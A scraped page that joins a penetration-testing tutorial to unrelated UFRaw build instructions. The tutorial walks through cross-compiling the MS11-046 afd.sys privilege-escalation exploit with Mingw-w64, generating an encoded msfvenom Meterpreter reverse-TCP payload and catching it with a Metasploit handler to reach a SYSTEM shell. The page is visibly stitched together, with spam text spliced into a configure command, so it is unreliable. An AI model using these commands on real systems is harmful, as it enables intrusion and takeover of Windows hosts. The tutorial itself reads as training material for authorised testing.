I586 Mingw32msvc Gcc For Mac

Microsoft Windows still holds the largest market share when it comes to operating systems for desktop computers, both for enterprise use and personal use. Therefore it is highly likely you will encounter a lot of Windows workstations and servers during your penetration testing training and career. On the other hand, most penetration testers mainly use Linux based distributions such as Kali Linux, Pentoo or Backbox. Therefor you need the ability to quickly compile Windows exploits on your Linux machine. The solution for this is: Mingw-w64.

Mingw-w64 is a free and open source software development environment for creating Windows applications. Mingw-w64 was originally called Mingw32 which didn’t support the 64 bit architecture. In this tutorial we will be looking at how to use Mingw-64 to compile exploits for Windows on Kali Linux. Let’s start with installing Mingw-w64 on Kali Linux.

For the MSYS environment you should install the packages msys, mingw-runtime, w32api, binutils and gcc from the MinGW site. Cygwin can be installed by downloading and running the installation program setup.exe. The pre-built versions will only work with MINGW or Cygwin. Note that the version you download must match that of the MINGW compiler, i586-mingw32msvc-gcc, which you can verify by typing 'i586-mingw32msvc-gcc -ver'.

Installing Mingw-w64 on Kali Linux

Mingw-w64 is not installed by default on Kali Linux 2016.2 and earlier version. Therefore we need to install it first before we can compile Windows exploits on Linux. Run the following commands to install Mingw-w64:

apt-get update

apt-get install mingw-w64

Use apt-get install mingw-w64 to install Mingw-w64 on your Kali host.

Type y for yes to confirm and continue the Mingw-w64 installation process. Downloading and installing Mingw-w64 may take a little while to complete.

Unable to locate package mingw-w64

Sometimes you get a Unable to locate package mingw-w64 error when trying to install the mingw-w64 package and get something like:

root@kali:~# apt-get install mingw-w64

Reading package lists… Done

Building dependency tree

Reading state information… Done

E: Unable to locate package mingw-w64

To solve this issue make sure you have the right repositories in the sources.list file. You can edit the file using nano:

/etc/apt/sources.list

Make sure you have the correct repositories in this file. You can find the repositories for different versions of Kali Linux on the following page:

With the right repositories in the sources.list file you need to run apt-get update and then run the installation command for the Mingw-w64 package again.

Cross compiling Windows exploits with Mingw-w64

Now that we have Mingw-w64 installed we can start to compile Windows exploits on Kali Linux. For this tutorial we will be compiling a Windows exploit written in c to exploit CVE-2011-1249 (MS11-046) vulnerability in Windows 7 SP0 x86. This version of the Windows operating system contains a vulnerability in the Ancillary Function Driver (AFD) which allows an elevation of privilege for an authenticated non administrative user. Even though Mingw-w64 was developed for the much needed 64 bit support we can also compile 32 bit Windows exploits. Let’s have a look at how we can compile 32 bit Windows exploits.

Let’s start with downloading the exploit from Exploit-db:

wget ‐‐output-document= 40564.c https://www.exploit-db.com/download/40564

Use the following command to compile the afd.sys exploit for Windows 32 bit:

i686-w64-mingw32-gcc [input file: source]–o [output file: .exe]–lws2_32

The following command will compile the Windows 7 afd.sys privilege escalation exploit:

i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32

To transfer the exploit to the target host we will be serving it with the build-in Apache webserver. The last 2 commands will copy exploit to the Apache home directory and start the Apache webserver.

When we download and execute the exploit from cmd.exe it will look like this:

The exploit executed successfully.

As we can see the whoami command returns a privileged user before executing the exploit and system user after. This exploit actually spawns a new shell in the current shell where it was launched from instead of a new shell in a new window. This means we can also run this exploit from command line shell, such as Meterpreter. Let’s see how we can run the exploit from a Meterpreter session.

Exploit compilation errors

When compiling exploits for different architectures and operating systems many errors can occur. There are a lot of variables which can cause the compilation to fail, such as: syntax, libraries, host and target architectures, installed software used for compiling code and a lot more. Some errors may be easy to fix and some are not. It is also important to distinct warnings from fatal errors since warnings may just indicate something like deprecated functions which do not prevent the exploit from working. Fatal errors do prevent the exploit from working and therefor need to be fixed.

The best way to deal with compilation errors is to read them carefully and then search Google for solutions. Often you’re not the first and only person facing a certain compilation error and therefore it is not necessary to reinvent the wheel. Online resources such as stack exchange often provide you with possible solutions for the most common compilation errors.

Exploit MS11-046 from a Meterpreter shell

Let’s quickly generate a Windows 32-bit Meterpreter reverse TCP payload using Msfvenom and execute it on the target host. We will be using the multi handler in Metasploit to catch the reverse shell.

Use the following command to create the payload using Msfvenom:

msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe

Be sure to replace the listening host IP and if necessary the listening port. Now start msfconsole and run the following commands to set up the multi handler exploit:

use exploit/multi/handler

set lhost [listening host IP]

set lport 4444

run

Than download the exploit to the target host and execute it. If everything was setup correctly you should receive a reverse Meterpreter shell on the msfconsole:

The target host connects back to the Kali box.

Next type shell on the Meterpreter command line and run the privilege escalation exploit to escalate the shell to a system shell:

The privilege escalation exploit executed successfully through our Meterpreter sessions.

As you can see the shell goes from the privileged test user shell to a system shell. Please note that a new system shell is spawned in the shell where it was executed from. Therefor we cannot see the exploit output as it is in the old shell with limited privileges.

You can verify this by typing Exit which will exit the system shell and return you to the user shell which still contains the Windows 7 privilege escalation exploit output:

Lessons learned

In this tutorial we have learned the basics of cross compiling exploits for Windows on Linux. We have learned how to install Mingw-w64 on Kali Linux and solve the most common installation problems. To practice the exploit compilation process we have compiled a privilege escalation exploit targeted for Windows 7 x86. This is also called cross compiling.

We have successfully executed the compiled executable on the target host and escalated the shell from a limited user shell to a system shell. We have learned that this particular exploit spawned a shell inside the shell where the exploit was executed from. This way we can also execute the privilege escalation exploit from a command line such as a Meterpreter shell. Last but not least we have learned about how to fix errors during the compilation process. As an ethical hacker and penetration tester it is advised to consult resources like stack exchange to search for solutions for compilation errors.

Learn more about working with exploits?

Check out these tutorials:

Download and install

To use the UFRaw Gimp plug-in you need first to install Gimp2.0 or higher. Gimp 2.4 is recommended.If you only plan to use UFRaw's stand-alone tool, there is no needto install Gimp, but the Gimp Tool Kit (GTK+2) is still needed.There is no need to installDCRaw itself since its code is incorporated into UFRaw.

Linux and other Unix compatible systems

There are UFRaw packages for several distributions:

• Debian.
• Ubuntu official packages, or more up-to-datePPA.
• Gentoo.
• Fedora.
• openSUSE.
• Alt Linux.
• archlinux.
• Italian Slackware Community.
• open mamba.

• FreeBSDFresh Ports.
• OpenBSD (See packages faq).
• NetBSD Packages Collection.
• Darwin ports for Mac OS X.
• Mac ports for Mac OS X.(See guide and usesudo port install ufraw)
• Nexeta OS.
• T2.
• rPath rBuilder.
• Cygwin -Cygwin ports.

Let me know if I missed something or if this list is not up to date.Other UFRaw RPM packages for Mandriva, Fedora, openSUSE and ALTLinuxcan be found atRPM pbone.net orRPM Find.

It sometimes takes time until these packages are updated. If you want thelatest and greatest version of UFRaw you'll might have to build it yourself.

To build UFRaw yourself you can either read the detailedinstructions below or justdownload it and get the shorter version in the README file.

I'm using Debian GNU/Linuxon a Pentium machine,but UFRaw can be built on different Unix flavorsand many different architectures. Let me know if your system isnot supported for some reason.

The following development packages are relevant for building UFRaw:

• The Gimp Tool Kit, GTK+2 (libgtk2.0>=2.6).
• For color management you need Little CMS (liblcms>=1.13).
• To build the Gimp plug-in you need Gimp (gimp>=2.0).
• To build the Cinepaint plug-in you need Cinepaint (cinepaint>=0.22).
• libtiff is required to create TIFF images.
• libjpeg is required to create JPEG images.
• libpng is required to create PNG images.
• libcfitsio3 is required to create FITS images.
• Exiv2 is required for EXIF support (does not support all camera models)(libexiv2>=0.11).
• To read gzipped raw files you need zlib.
• To read bzipped raw files you need libbz2.
• To be able to scroll the preview window you needGtkImageView(libgtkimageview>=1.3).
• lensfun is required to apply lens correction. This option is experimental.Enable with ./configure --with-lensfun.Read this before using it.

Only gtk+2.0 and liblcms are required. The others are optional, theirrelevant features will be enabled if they are found during configuration.In Debian you can get these packages with the command(requires root privelege):

apt-get install libgtk2.0-dev liblcms-dev libgimp2.0-devlibtiff-dev libjpeg62-dev libpng12-dev libexiv2-dev zlib1g-devlibbz2-dev libgtkimageview-dev

The libgtkimageview-dev package only exists in Debian testing and unstable.For cinepaint 0.22 there is no Debian package at the moment.

Now, you can download the UFRaw tarballufraw-0.22.tar.gz,extract the files from it and enter theufraw-0.22 directory:

Next, you should run the configuration script:

You will get a long output and at the end there will be a summarythat should look approximately like:

There are also UFRaw specific flags for configure:

--enable-mime - install mime files, see README for more information

--enable-extras - build extra (dcraw, nikon-curve) executables

--enable-dst-correction - enable DST correction for file timestamps.

--enable-contrast - enable the contrast setting option.

--enable-interp-none: enable 'None' interpolation (mostly for debugging).

--with-lensfun: use the lensfun library - experimental feature,read this before using it.

--with-prefix=PREFIX - use also PREFIX as an input prefix for the build

--with-dosprefix=PREFIX - PREFIX in the the prefix in dos format (needed only for ms-windows)

Next, you should build UFRaw by typing the command:

make

For installing the UFRaw Gimp plug-in, you have two options.You caninstall it only for the current user, which does not require rootprivileges,but only the current user will see the plug-in

gimp-tool --install-bin ufraw-gimp

or you can make a system wide installation (requires rootprivileges)

make install

This will also install the stand-alone toolsufraw, ufraw-batchand some related files (man page, icon and desktop definitions).

Macintosh

One option is to use the UFRaw packagefrom Darwin portsor Mac ports.

If you use the GIMP on OS Xapplication bundle, then the UFRaw plug-in is already bundled withGimp. As far as I know the stand-alone version of UFRaw is not included.

Another option is thepoint & click installer for theUFRaw-0.9.1 GIMP plug-in.It was designed for the GimpShop, but might also work with the standard Gimp.

A more recent option isthis native Mac OS X version of UFRaw

Mac OS X is in principle just another Unix flavor based onFreeBSD. I have no experience working with the Mac,but I was reported that UFRaw can be built on the Mac OS X usingthe Fink package manager.Just follow the Unix instruction where your configuration command shouldlook like

./configure --prefix=/sw --with-prefix=/swAndroid ppsspp iso games download.

MS-Windows

For MS-Windows users I have two installation versions. The 'fordummies' version where you only need to download and run an installerand the 'for geeks' version if you want to build the plug-inyourself.

I'm not a big fan of this operating system, so why does it get suchspecial attention?UFRaw is a free software (as in free speech, not as in free beer).In this spirit I try to give the users the freedom to use it inany environment, even in environments like MS-Windows thattry to take your freedom away by imposing proprietary standards on you.You are encouraged to use other free software likeGimp for editing your images,Firefox for surfing the net (in fact Firefox renders this page better),and LibreOffice for an office suite.

Another reason is that building UFRaw on MS-Windows is a bit trickyand not very convenient (did I say already that I don't like this operatingsystem). I actually create the MS version of UFRaw ina Linux environment, but I guess that most of the users of the MS versiondon't have access to Linux, otherwise they would not need the MS version.

MS-Windows for dummies

UFRaw is now a stand-alone application (it used to depend on Gimp).You just need to download and runthis.

The upside of UFRaw being a stand-alnoe installation is that it should work more reliably, without the DLL issues that many users had.

One downside is that the installer is much bigger (9MB) and requiresmuch more disk space (53MB).

Another downside is that there is no GIMP plug-in. You only get a thestand-alone version of UFRaw. A plug-in executable (ufraw-gimp.exe) isincluded, but it does not function. It will not work with GIMP-2.8.There might be a way to get it to work with GIMP-2.6, but I did nottry.

MS-Windows for geeks

I build UFRaw using a cross-compiler in Linux.It is also be possible to build UFRaw in the Cygwinenvironment, which imitates the Unix environment on MS-Windows.After setting up the environment and installing all the required packagesthe installation procedure is the same as for Unix. If you want tocompile UFRaw in another environment or with a differentcompiler then you are on your own.

I use the Debian packagemingw32for cross compiling.

For the MSYS environment you should install the packagesmsys, mingw-runtime, w32api, binutils and gcc from theMinGW site.

Cygwincan be installed by downloading and running the installation programsetup.exe.In addition to the default packages installed, you will also need thefollowing packages, which you can find in the Develcategory in the setup:

• gcc: C compiler
• make: The GNU version of the 'make' utility
• pkgconfig: A utility used to retrieve information about installedlibraries

You can build a native Cygwin binary of UFRaw using the developementpackages fromCygwin ports,or you can use Cygwin to cross build a MinGW32 binary.

You will need the following development packages:

• gimp-dev (at least version 2.2)
• gtk+-dev (at least version 2.6)
• glib-dev
• pango-dev
• atk
• gettext
• libiconvi
• liblcms (at least version 1.13)
• libjpeg
• libtiff
• libpng
• zlib
• libbz2
• exiv2 (at list version 0.11)
• gtkimageview (at list version 1.3)

Most packages can be downloaded from Tor Lillqvist GimpWindows port or from theGnuWin32 project.The Gimp development package ishere.Other packages you might have to build yourself.

Extract all these files under one directory,for example c:mingw32.In Linux I use the directory /opt/mingw32.Notice that all these libraries arenot for Cygwin but for MinGW32. Thisis because they are used to cross build UFRaw on MinGW32.

pkg-config behaves differently under MinGW32.Therefore, if you are cross compling, you will have to modify all the*.pc files that come with the different packages. The following script shoulddo the trick (after updating TARGET to your needs):

At this point you should start followingthe installation instructions for Unix users.In Debian you will need the following configuration command:

./configure --with-prefix=/opt/mingw32 --with-dosprefix=z:optmingw32--host=i586-mingw32msvc --target=i586-mingw32msvc --build=i386-linux

In Cygwin you will need the following configuration command:

./configure -with-prefix=/cygdrive/c/mingw32 --with-dosprefix=c:mingw32--host=i686-mingw32msvc --target=i686-mingw32msvc --build=i686-cygwin

The window installer is created usingInno Setup,therefore if you want to create a UFRaw-installeryou should install Inno Setup first.If you are cross-compiling ufraw on linux, you will needWine.This will allow you to make windows-installer or tomake install-windows.